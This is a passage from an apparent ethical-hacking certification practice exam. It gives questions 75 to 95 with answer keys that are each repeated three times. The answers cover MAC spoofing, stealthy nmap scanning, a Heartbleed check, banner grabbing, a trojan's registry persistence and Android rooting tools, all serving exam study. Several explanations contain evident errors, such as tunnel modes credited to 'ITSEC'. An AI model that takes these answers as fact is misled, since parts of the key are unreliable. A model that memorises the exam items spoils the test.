Pinging all addresses and examining response latency will discover a sniffer, Sending ARP messages to all systems and watching for NOARP responses will discover a sniffer, and Configuring the IDS to watch for NICs in promiscuous mode will discover sniffers are incorrect.
Latency in a ping response has nothing to do with sniffing; NOARP is a Linux kernel module, and it’s impossible to see a NIC in promiscuous mode from a monitoring station (unless you’re on the system itself and looking at the NIC properties).
Unattempted
Correct Answer:
It is almost impossible to discover a sniffer on the network is correct.
While not impossible, sniffer discovery _is_ difficult. If the sniffer is implanted somewhere on the network using a device with an IP address, it may be possible to find it (the system it’s running on will have _some_ record of it somewhere). However, many network taps are passive and have no address at all. A NIC just pulling packets in won’t necessarily alert anything or provide any triggers for watchful eyes. However, active sniffing, where MAC flooding or ARP spoofing is being used, is another thing altogether.
Incorrect Answers:
Pinging all addresses and examining response latency will discover a sniffer, Sending ARP messages to all systems and watching for NOARP responses will discover a sniffer, and Configuring the IDS to watch for NICs in promiscuous mode will discover sniffers are incorrect.
Latency in a ping response has nothing to do with sniffing; NOARP is a Linux kernel module, and it’s impossible to see a NIC in promiscuous mode from a monitoring station (unless you’re on the system itself and looking at the NIC properties).
Question 76 of 100
76. Question
Which of the following is best known for replacing notepad.exe on Windows systems?
Correct
Correct answer:
TROJ_QAZ is correct. TROJ_QAZ replaces notepad.exe on the system in an effort to hide. It also drops into the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run startIE = “{malware path and file name} qaz”.
Incorrect answers:
SubRoot, from 2009, creates a full-control back door over port 1700 (TCP).
Restorator is a defacement Trojan.
Biodox is a GUI full remote-control Trojan.
Incorrect
Correct answer:
TROJ_QAZ is correct. TROJ_QAZ replaces notepad.exe on the system in an effort to hide. It also drops into the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run startIE = “{malware path and file name} qaz”.
Incorrect answers:
SubRoot, from 2009, creates a full-control back door over port 1700 (TCP).
Restorator is a defacement Trojan.
Biodox is a GUI full remote-control Trojan.
Unattempted
Correct answer:
TROJ_QAZ is correct. TROJ_QAZ replaces notepad.exe on the system in an effort to hide. It also drops into the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run startIE = “{malware path and file name} qaz”.
Incorrect answers:
SubRoot, from 2009, creates a full-control back door over port 1700 (TCP).
Restorator is a defacement Trojan.
Biodox is a GUI full remote-control Trojan.
Question 77 of 100
77. Question
On a Windows-based machine, which switch can be used in ping to set the size of the echo request packet?
Correct
Correct Answer:
-l is correct. The -l switch allows you to change the default packet size of an echo request leaving your machine. The default packet size leaving a Windows machine is 32 bytes.
Incorrect Answers:
The -a switch resolves addresses to hostnames.
The -s switch provides a timestamp for count hops.
The -t switch indicates the ping will continue until stopped.
Incorrect
Correct Answer:
-l is correct. The -l switch allows you to change the default packet size of an echo request leaving your machine. The default packet size leaving a Windows machine is 32 bytes.
Incorrect Answers:
The -a switch resolves addresses to hostnames.
The -s switch provides a timestamp for count hops.
The -t switch indicates the ping will continue until stopped.
Unattempted
Correct Answer:
-l is correct. The -l switch allows you to change the default packet size of an echo request leaving your machine. The default packet size leaving a Windows machine is 32 bytes.
Incorrect Answers:
The -a switch resolves addresses to hostnames.
The -s switch provides a timestamp for count hops.
The -t switch indicates the ping will continue until stopped.
Question 78 of 100
78. Question
Which of the following commands is used to open a collection of Windows administrative tools that you can use to manage a local or remote computer?
Correct
Correct answer:
compmgmt.msc is correct. Compmgmt.msc is used to open the Computer Management console, which holds all sorts of tools to manage the machine. This can be done on the local machine or, assuming you have rights and a proper network connection, a remote system. You can run any MMC in 64- or 32-bit mode (using the /64 or /32 switches, respectively).
Incorrect answers:
services MMC is opened by services.msc.
gpedit (.msc) opens the Group Policy Editor.
ncpa.cp does not exist.
Incorrect
Correct answer:
compmgmt.msc is correct. Compmgmt.msc is used to open the Computer Management console, which holds all sorts of tools to manage the machine. This can be done on the local machine or, assuming you have rights and a proper network connection, a remote system. You can run any MMC in 64- or 32-bit mode (using the /64 or /32 switches, respectively).
Incorrect answers:
services MMC is opened by services.msc.
gpedit (.msc) opens the Group Policy Editor.
ncpa.cp does not exist.
Unattempted
Correct answer:
compmgmt.msc is correct. Compmgmt.msc is used to open the Computer Management console, which holds all sorts of tools to manage the machine. This can be done on the local machine or, assuming you have rights and a proper network connection, a remote system. You can run any MMC in 64- or 32-bit mode (using the /64 or /32 switches, respectively).
Incorrect answers:
services MMC is opened by services.msc.
gpedit (.msc) opens the Group Policy Editor.
ncpa.cp does not exist.
Question 79 of 100
79. Question
Which of the following statements is true?
Correct
Correct Answer:
Pcap is used on Windows. Libpcap is used on Linux is correct.
Pcap (for Windows) and its Linux-based brother libpcap are the packet capture libraries/drives used by virtually every sniffing and scanning tool you can think of—nmap, Snort, Wireshark, tcpdump, kismet, and L0phtCrack, for example. For extra fun—and possibly a _Jeopardy_-type question on your exam—libpcap was written in C/C++.
Incorrect Answers:
Pcap is an encryption algorithm, Pcap is used on Linux. Libpcap is used on Windows, and Pcap is a command-line tool for sniffing are incorrect.
The other answers provided are not true regarding Pcap.
Incorrect
Correct Answer:
Pcap is used on Windows. Libpcap is used on Linux is correct.
Pcap (for Windows) and its Linux-based brother libpcap are the packet capture libraries/drives used by virtually every sniffing and scanning tool you can think of—nmap, Snort, Wireshark, tcpdump, kismet, and L0phtCrack, for example. For extra fun—and possibly a _Jeopardy_-type question on your exam—libpcap was written in C/C++.
Incorrect Answers:
Pcap is an encryption algorithm, Pcap is used on Linux. Libpcap is used on Windows, and Pcap is a command-line tool for sniffing are incorrect.
The other answers provided are not true regarding Pcap.
Unattempted
Correct Answer:
Pcap is used on Windows. Libpcap is used on Linux is correct.
Pcap (for Windows) and its Linux-based brother libpcap are the packet capture libraries/drives used by virtually every sniffing and scanning tool you can think of—nmap, Snort, Wireshark, tcpdump, kismet, and L0phtCrack, for example. For extra fun—and possibly a _Jeopardy_-type question on your exam—libpcap was written in C/C++.
Incorrect Answers:
Pcap is an encryption algorithm, Pcap is used on Linux. Libpcap is used on Windows, and Pcap is a command-line tool for sniffing are incorrect.
The other answers provided are not true regarding Pcap.
Question 80 of 100
80. Question
Which of the following should be included in a security policy? (Choose all that apply.)
Correct
Correct answers:
References to supporting documents, policy exceptions, and noncompliance disciplinary actions are correct. A security policy defines everything about your security layout for your employees. Of course it will include references to all sorts of documentation (such as lists of allowed hardware and software as well as locations for related policies and procedures), exceptions (hopefully few, but there will be some), and what happens to employees should they decide to stray from the policy.
Incorrect answers:
Procedures is incorrect. Procedures and technical details will be found in procedure documents, not in the security policy itself.
Incorrect
Correct answers:
References to supporting documents, policy exceptions, and noncompliance disciplinary actions are correct. A security policy defines everything about your security layout for your employees. Of course it will include references to all sorts of documentation (such as lists of allowed hardware and software as well as locations for related policies and procedures), exceptions (hopefully few, but there will be some), and what happens to employees should they decide to stray from the policy.
Incorrect answers:
Procedures is incorrect. Procedures and technical details will be found in procedure documents, not in the security policy itself.
Unattempted
Correct answers:
References to supporting documents, policy exceptions, and noncompliance disciplinary actions are correct. A security policy defines everything about your security layout for your employees. Of course it will include references to all sorts of documentation (such as lists of allowed hardware and software as well as locations for related policies and procedures), exceptions (hopefully few, but there will be some), and what happens to employees should they decide to stray from the policy.
Incorrect answers:
Procedures is incorrect. Procedures and technical details will be found in procedure documents, not in the security policy itself.
Question 81 of 100
81. Question
A security admin has turned on MAC filtering on a WAP. Which of the following is the best way to bypass this activity?
Correct
Correct Answer:
MAC spoofing is correct. So the admin says, “Only allow these MAC addresses to connect,” and the WAP is secure, right? Sure. And I have a future as an NBA player. Simply sniff traffic until you find a MAC that works and spoof it. Voilà!
Incorrect Answers:
ARP spoofing, DNS poisoning, and IP spoofing are incorrect.
ARP won’t do any good here—you can use it to misdirect traffic but not to authenticate.
DNS poisoning works with name resolution and has no place here.
IP spoofing is on the right track, but MAC filtering is done at Layer 2, so it wouldn’t work here.
Incorrect
Correct Answer:
MAC spoofing is correct. So the admin says, “Only allow these MAC addresses to connect,” and the WAP is secure, right? Sure. And I have a future as an NBA player. Simply sniff traffic until you find a MAC that works and spoof it. Voilà!
Incorrect Answers:
ARP spoofing, DNS poisoning, and IP spoofing are incorrect.
ARP won’t do any good here—you can use it to misdirect traffic but not to authenticate.
DNS poisoning works with name resolution and has no place here.
IP spoofing is on the right track, but MAC filtering is done at Layer 2, so it wouldn’t work here.
Unattempted
Correct Answer:
MAC spoofing is correct. So the admin says, “Only allow these MAC addresses to connect,” and the WAP is secure, right? Sure. And I have a future as an NBA player. Simply sniff traffic until you find a MAC that works and spoof it. Voilà!
Incorrect Answers:
ARP spoofing, DNS poisoning, and IP spoofing are incorrect.
ARP won’t do any good here—you can use it to misdirect traffic but not to authenticate.
DNS poisoning works with name resolution and has no place here.
IP spoofing is on the right track, but MAC filtering is done at Layer 2, so it wouldn’t work here.
Question 82 of 100
82. Question
Two different organizations have their own public key infrastructure up and running. When the two companies merged, security personnel wanted both PKIs to validate certificates from each other. What must the CAs for both companies establish to accomplish this?
Correct
Correct answer:
Cross-certification is correct. When PKIs need to talk to one another and trust certificates from either side, the CAs need to set up a mutual trust known as “cross-certification.”
Incorrect answers:
All other answers are incorrect. These terms are not valid.
Incorrect
Correct answer:
Cross-certification is correct. When PKIs need to talk to one another and trust certificates from either side, the CAs need to set up a mutual trust known as “cross-certification.”
Incorrect answers:
All other answers are incorrect. These terms are not valid.
Unattempted
Correct answer:
Cross-certification is correct. When PKIs need to talk to one another and trust certificates from either side, the CAs need to set up a mutual trust known as “cross-certification.”
Incorrect answers:
All other answers are incorrect. These terms are not valid.
Question 83 of 100
83. Question
You want to run a reliable scan but remain as stealthy as possible. Which of the following nmap commands accomplishes your goal best?
Correct
Correct answer:
nmap -sS targetIPaddress is correct. A full-connect scan would probably be best, provided you run it slowly. However, given the choices, a half-open scan, as defined by this nmap command line, is the best remaining option. In the interest of running it slowly, you could certainly add a -T# flag. A scan using -sO -T4 is wild, is fast, and undoubtedly causes all sorts of alerts. Swap it out for a -T2 flag, and you’re running much more quietly. In the real world, a full-connect scan would result in plenty of logs to alert watchful eyes of something amiss going on, while half-open scans will almost certainly do the same. It’s a virtual toss up, but for either choice, speed (or lack thereof) is your best option.
Incorrect answers:
A null scan (-sN) probably won’t provide the reliability asked for since it doesn’t work on Windows hosts at all.
An operating system (-sO) scan would prove too noisy here.
A full scan (-sT) would provide reliable results, but without a timing modifier to greatly slow it down, it will definitely be seen.
Incorrect
Correct answer:
nmap -sS targetIPaddress is correct. A full-connect scan would probably be best, provided you run it slowly. However, given the choices, a half-open scan, as defined by this nmap command line, is the best remaining option. In the interest of running it slowly, you could certainly add a -T# flag. A scan using -sO -T4 is wild, is fast, and undoubtedly causes all sorts of alerts. Swap it out for a -T2 flag, and you’re running much more quietly. In the real world, a full-connect scan would result in plenty of logs to alert watchful eyes of something amiss going on, while half-open scans will almost certainly do the same. It’s a virtual toss up, but for either choice, speed (or lack thereof) is your best option.
Incorrect answers:
A null scan (-sN) probably won’t provide the reliability asked for since it doesn’t work on Windows hosts at all.
An operating system (-sO) scan would prove too noisy here.
A full scan (-sT) would provide reliable results, but without a timing modifier to greatly slow it down, it will definitely be seen.
Unattempted
Correct answer:
nmap -sS targetIPaddress is correct. A full-connect scan would probably be best, provided you run it slowly. However, given the choices, a half-open scan, as defined by this nmap command line, is the best remaining option. In the interest of running it slowly, you could certainly add a -T# flag. A scan using -sO -T4 is wild, is fast, and undoubtedly causes all sorts of alerts. Swap it out for a -T2 flag, and you’re running much more quietly. In the real world, a full-connect scan would result in plenty of logs to alert watchful eyes of something amiss going on, while half-open scans will almost certainly do the same. It’s a virtual toss up, but for either choice, speed (or lack thereof) is your best option.
Incorrect answers:
A null scan (-sN) probably won’t provide the reliability asked for since it doesn’t work on Windows hosts at all.
An operating system (-sO) scan would prove too noisy here.
A full scan (-sT) would provide reliable results, but without a timing modifier to greatly slow it down, it will definitely be seen.
Question 84 of 100
84. Question
Which of the following best describes an effort to maintain the communications channel between the two entities in hopes of sniffing valuable data?
Correct
Correct answer:
Man in the middle is correct. This correctly describes a man-in-the-middle attack. The idea of a man-in-the-middle attack is to maintain the communications channel between the two entities in hopes of sniffing valuable data.
Incorrect answers:
Polymorphic is a virus type.
Proxy sitter is a distractor.
Session hijacking would have knocked one of the participants out of the communications channel.
Incorrect
Correct answer:
Man in the middle is correct. This correctly describes a man-in-the-middle attack. The idea of a man-in-the-middle attack is to maintain the communications channel between the two entities in hopes of sniffing valuable data.
Incorrect answers:
Polymorphic is a virus type.
Proxy sitter is a distractor.
Session hijacking would have knocked one of the participants out of the communications channel.
Unattempted
Correct answer:
Man in the middle is correct. This correctly describes a man-in-the-middle attack. The idea of a man-in-the-middle attack is to maintain the communications channel between the two entities in hopes of sniffing valuable data.
Incorrect answers:
Polymorphic is a virus type.
Proxy sitter is a distractor.
Session hijacking would have knocked one of the participants out of the communications channel.
Question 85 of 100
85. Question
Which of the following tools allow for Bluetooth device discovery? (Choose two.)
Correct
Correct answers:
BlueScanner and BT Browser are correct. BlueScanner (from SourceForge) does a great job of finding devices around you, and can also try to extract and display as much information as possible. BT Browser is another great, and well-known, tool for finding and enumerating nearby devices.
Incorrect answers:
BBProxy is a BlackBerry-centric tool that’s useful in an attack called Blackjacking.
PhoneSnoop is good for spyware on a BlackBerry.
Incorrect
Correct answers:
BlueScanner and BT Browser are correct. BlueScanner (from SourceForge) does a great job of finding devices around you, and can also try to extract and display as much information as possible. BT Browser is another great, and well-known, tool for finding and enumerating nearby devices.
Incorrect answers:
BBProxy is a BlackBerry-centric tool that’s useful in an attack called Blackjacking.
PhoneSnoop is good for spyware on a BlackBerry.
Unattempted
Correct answers:
BlueScanner and BT Browser are correct. BlueScanner (from SourceForge) does a great job of finding devices around you, and can also try to extract and display as much information as possible. BT Browser is another great, and well-known, tool for finding and enumerating nearby devices.
Incorrect answers:
BBProxy is a BlackBerry-centric tool that’s useful in an attack called Blackjacking.
PhoneSnoop is good for spyware on a BlackBerry.
Question 86 of 100
86. Question
You hire guards and post guard dogs on the property. Which kind of security measure have you put into place?
Correct
Correct answer:
Physical is correct. Physical measures include all the things you can touch, taste, smell, or get shocked by. Examples of physical controls include bollards, lighting, locks, fences, and guards with Tasers or accompanied by angry German Shepherds.
Incorrect answers:
Technical measures are taken with technology in mind to protect explicitly at the physical level (smartcards and biometrics, for example).
Operational measures are the policies and procedures you set up to enforce a security-minded operation.
Aggressive is not a valid security control measure.
Incorrect
Correct answer:
Physical is correct. Physical measures include all the things you can touch, taste, smell, or get shocked by. Examples of physical controls include bollards, lighting, locks, fences, and guards with Tasers or accompanied by angry German Shepherds.
Incorrect answers:
Technical measures are taken with technology in mind to protect explicitly at the physical level (smartcards and biometrics, for example).
Operational measures are the policies and procedures you set up to enforce a security-minded operation.
Aggressive is not a valid security control measure.
Unattempted
Correct answer:
Physical is correct. Physical measures include all the things you can touch, taste, smell, or get shocked by. Examples of physical controls include bollards, lighting, locks, fences, and guards with Tasers or accompanied by angry German Shepherds.
Incorrect answers:
Technical measures are taken with technology in mind to protect explicitly at the physical level (smartcards and biometrics, for example).
Operational measures are the policies and procedures you set up to enforce a security-minded operation.
Aggressive is not a valid security control measure.
Question 87 of 100
87. Question
Which of the following statements is true regarding Kerberos?
Correct
Correct answers:
All the above is correct. Kerberos makes use of both symmetric and asymmetric encryption technologies to securely transmit passwords and keys across a network. The entire process consists of a key distribution center (KDC), an authentication service (AS), a ticket granting service (TGS), and the ticket granting ticket (TGT). It can make use of both TCP and UDP and runs over port 88.
Incorrect answers:
Because all these are true statements, none can individually be the correct answer.
Incorrect
Correct answers:
All the above is correct. Kerberos makes use of both symmetric and asymmetric encryption technologies to securely transmit passwords and keys across a network. The entire process consists of a key distribution center (KDC), an authentication service (AS), a ticket granting service (TGS), and the ticket granting ticket (TGT). It can make use of both TCP and UDP and runs over port 88.
Incorrect answers:
Because all these are true statements, none can individually be the correct answer.
Unattempted
Correct answers:
All the above is correct. Kerberos makes use of both symmetric and asymmetric encryption technologies to securely transmit passwords and keys across a network. The entire process consists of a key distribution center (KDC), an authentication service (AS), a ticket granting service (TGS), and the ticket granting ticket (TGT). It can make use of both TCP and UDP and runs over port 88.
Incorrect answers:
Because all these are true statements, none can individually be the correct answer.
Question 88 of 100
88. Question
A security team member enters the following: “` nmap -d –script ssl-heartbleed –script-args vulns.showall -sV [host] “` Which of the following would you expect to see returned?
Correct
Correct answer:
A return of “State: NOT VULNERABLE” on systems protected against Heartbleed is correct. You can use the nmap command “nmap -d -script ssl-heartbleed -script-args vulns.showall -sV [host]” to search for the vulnerability; the returned message will say “State: NOT VULNERABLE” if you’re good to go.
Incorrect answers:
All other answers are incorrect. The remaining answers do not match the command provided.
Incorrect
Correct answer:
A return of “State: NOT VULNERABLE” on systems protected against Heartbleed is correct. You can use the nmap command “nmap -d -script ssl-heartbleed -script-args vulns.showall -sV [host]” to search for the vulnerability; the returned message will say “State: NOT VULNERABLE” if you’re good to go.
Incorrect answers:
All other answers are incorrect. The remaining answers do not match the command provided.
Unattempted
Correct answer:
A return of “State: NOT VULNERABLE” on systems protected against Heartbleed is correct. You can use the nmap command “nmap -d -script ssl-heartbleed -script-args vulns.showall -sV [host]” to search for the vulnerability; the returned message will say “State: NOT VULNERABLE” if you’re good to go.
Incorrect answers:
All other answers are incorrect. The remaining answers do not match the command provided.
Question 89 of 100
89. Question
An attacker sends SMS text messages crafted to appear as legitimate security notifications, with a phone number provided. The user unwittingly calls the number and provides sensitive data in response. Which of the following correctly describes this attack?
Correct
Correct answer:
Smishing is correct. Smishing refers to an attack using SMS text messages crafted to appear as legitimate security notifications, with a phone number provided. The user unwittingly calls the number and provides sensitive data in response.
Incorrect answers:
Vishing refers to using a phone in social engineering
Phishing uses e-mail.
Text attack is not a valid term.
Incorrect
Correct answer:
Smishing is correct. Smishing refers to an attack using SMS text messages crafted to appear as legitimate security notifications, with a phone number provided. The user unwittingly calls the number and provides sensitive data in response.
Incorrect answers:
Vishing refers to using a phone in social engineering
Phishing uses e-mail.
Text attack is not a valid term.
Unattempted
Correct answer:
Smishing is correct. Smishing refers to an attack using SMS text messages crafted to appear as legitimate security notifications, with a phone number provided. The user unwittingly calls the number and provides sensitive data in response.
Incorrect answers:
Vishing refers to using a phone in social engineering
Phishing uses e-mail.
Text attack is not a valid term.
Question 90 of 100
90. Question
Which of the following best describes an effort to identify systems that are critical for continuation of operation for the organization?
Correct
Correct answer:
BIA is correct. The business impact analysis (BIA) best matches this description.
Incorrect answers:
Digital signatures, good authentication measures, and solid password policy are all great things to have; however, none of them identify critical systems.
Incorrect
Correct answer:
BIA is correct. The business impact analysis (BIA) best matches this description.
Incorrect answers:
Digital signatures, good authentication measures, and solid password policy are all great things to have; however, none of them identify critical systems.
Unattempted
Correct answer:
BIA is correct. The business impact analysis (BIA) best matches this description.
Incorrect answers:
Digital signatures, good authentication measures, and solid password policy are all great things to have; however, none of them identify critical systems.
Question 91 of 100
91. Question
During a pen test, you notice VoIP traffic is traversing the subnet. Which of the following tools could be used to decode a packet capture and extract voice conversations?
Correct
Correct answer:
Cain is correct. Cain (and Abel) can do all sorts of great stuff, including extracting voice from VoIP captures.
Incorrect answers:
The remaining answers do not perform the task listed.
Black Widow copies websites to your system for later review.
Netcat can be used for all sorts of things but is mostly known for its use in creating backdoor access to compromised systems.
Nmap is probably the best-known port scanner in the world.
Incorrect
Correct answer:
Cain is correct. Cain (and Abel) can do all sorts of great stuff, including extracting voice from VoIP captures.
Incorrect answers:
The remaining answers do not perform the task listed.
Black Widow copies websites to your system for later review.
Netcat can be used for all sorts of things but is mostly known for its use in creating backdoor access to compromised systems.
Nmap is probably the best-known port scanner in the world.
Unattempted
Correct answer:
Cain is correct. Cain (and Abel) can do all sorts of great stuff, including extracting voice from VoIP captures.
Incorrect answers:
The remaining answers do not perform the task listed.
Black Widow copies websites to your system for later review.
Netcat can be used for all sorts of things but is mostly known for its use in creating backdoor access to compromised systems.
Nmap is probably the best-known port scanner in the world.
Question 92 of 100
92. Question
Which of the following tools is useful in banner grabbing?
Correct
Correct answer:
Telnet is correct. Banner grabbing is one of the easiest enumerating methods to use and involves sending an unsolicited request to an open port to see what, if any, default message (banner) is returned. Telnet provides a very easy way to accomplish this: just use telnet IPADDRESS 80 (where IPADDRESS is the address of your target and port 80 looks for the HTTP HEAD response). Most other scanning tools (netcat, nmap, and so on) can also provide banner grabbing.
Incorrect answers:
Nslookup is for DNS queries
Traceroute is for path mapping
AngryIP is a host discovery tool
Silica is used for wireless discovery.
Incorrect
Correct answer:
Telnet is correct. Banner grabbing is one of the easiest enumerating methods to use and involves sending an unsolicited request to an open port to see what, if any, default message (banner) is returned. Telnet provides a very easy way to accomplish this: just use telnet IPADDRESS 80 (where IPADDRESS is the address of your target and port 80 looks for the HTTP HEAD response). Most other scanning tools (netcat, nmap, and so on) can also provide banner grabbing.
Incorrect answers:
Nslookup is for DNS queries
Traceroute is for path mapping
AngryIP is a host discovery tool
Silica is used for wireless discovery.
Unattempted
Correct answer:
Telnet is correct. Banner grabbing is one of the easiest enumerating methods to use and involves sending an unsolicited request to an open port to see what, if any, default message (banner) is returned. Telnet provides a very easy way to accomplish this: just use telnet IPADDRESS 80 (where IPADDRESS is the address of your target and port 80 looks for the HTTP HEAD response). Most other scanning tools (netcat, nmap, and so on) can also provide banner grabbing.
Incorrect answers:
Nslookup is for DNS queries
Traceroute is for path mapping
AngryIP is a host discovery tool
Silica is used for wireless discovery.
Question 93 of 100
93. Question
A pen test member has gained access to a facility. She positions herself beside a partition wall in such a way that the screen activity of an employee is clearly viewable. Which social engineering attack is this?
Correct
Correct answer:
Shoulder surfing is correct. Shoulder surfing occurs when an attacker stands behind an authorized user and watches their screen activity.
Incorrect answers:
Impersonation occurs when an attacker pretends to be a person of authority.
Tailgating occurs when the attacker uses a fake badge and follows employees through an open door, whereas piggybacking does not involve the use a badge of any sort.
Incorrect
Correct answer:
Shoulder surfing is correct. Shoulder surfing occurs when an attacker stands behind an authorized user and watches their screen activity.
Incorrect answers:
Impersonation occurs when an attacker pretends to be a person of authority.
Tailgating occurs when the attacker uses a fake badge and follows employees through an open door, whereas piggybacking does not involve the use a badge of any sort.
Unattempted
Correct answer:
Shoulder surfing is correct. Shoulder surfing occurs when an attacker stands behind an authorized user and watches their screen activity.
Incorrect answers:
Impersonation occurs when an attacker pretends to be a person of authority.
Tailgating occurs when the attacker uses a fake badge and follows employees through an open door, whereas piggybacking does not involve the use a badge of any sort.
Question 94 of 100
94. Question
Which of the following is a suite of IETF specifications for securing certain kinds of information provided by DNS?
Correct
Correct answer:
DNSSEC is correct. Way back in 1999, the Domain Name System Security Extensions (DNSSEC) was released to provide DNS clients the ability to authenticate the origin of a request and to provide for data integrity. DNSSEC is a suite of IETF specifications for securing certain kinds of information provided by DNS. Dan Kaminsky made DNS vulnerabilities widely known back around 2010, and many service providers are rolling this extension out to ensure that DNS results are cryptographically protected.
Incorrect answers:
ITSEC is an encryption method (providing transport and tunnel modes).
Recursive DNS refers to the process a DNS server takes in looking up a name (recursive DNS name servers are responsible for providing the proper IP address of the intended domain name to the requesting host).
Split DNS occurs when you create two zones for the same domain namespace—one for internal and one for external.
Incorrect
Correct answer:
DNSSEC is correct. Way back in 1999, the Domain Name System Security Extensions (DNSSEC) was released to provide DNS clients the ability to authenticate the origin of a request and to provide for data integrity. DNSSEC is a suite of IETF specifications for securing certain kinds of information provided by DNS. Dan Kaminsky made DNS vulnerabilities widely known back around 2010, and many service providers are rolling this extension out to ensure that DNS results are cryptographically protected.
Incorrect answers:
ITSEC is an encryption method (providing transport and tunnel modes).
Recursive DNS refers to the process a DNS server takes in looking up a name (recursive DNS name servers are responsible for providing the proper IP address of the intended domain name to the requesting host).
Split DNS occurs when you create two zones for the same domain namespace—one for internal and one for external.
Unattempted
Correct answer:
DNSSEC is correct. Way back in 1999, the Domain Name System Security Extensions (DNSSEC) was released to provide DNS clients the ability to authenticate the origin of a request and to provide for data integrity. DNSSEC is a suite of IETF specifications for securing certain kinds of information provided by DNS. Dan Kaminsky made DNS vulnerabilities widely known back around 2010, and many service providers are rolling this extension out to ensure that DNS results are cryptographically protected.
Incorrect answers:
ITSEC is an encryption method (providing transport and tunnel modes).
Recursive DNS refers to the process a DNS server takes in looking up a name (recursive DNS name servers are responsible for providing the proper IP address of the intended domain name to the requesting host).
Split DNS occurs when you create two zones for the same domain namespace—one for internal and one for external.
Question 95 of 100
95. Question
Which of the following tools is the best option for rooting an Android device?
Correct
Correct answer:
SuperOneClick is correct. SuperOneClick is designed for rooting Android.
Incorrect answer:
All other answers are incorrect. Each of these options is designed for use on iOS devices.
Incorrect
Correct answer:
SuperOneClick is correct. SuperOneClick is designed for rooting Android.
Incorrect answer:
All other answers are incorrect. Each of these options is designed for use on iOS devices.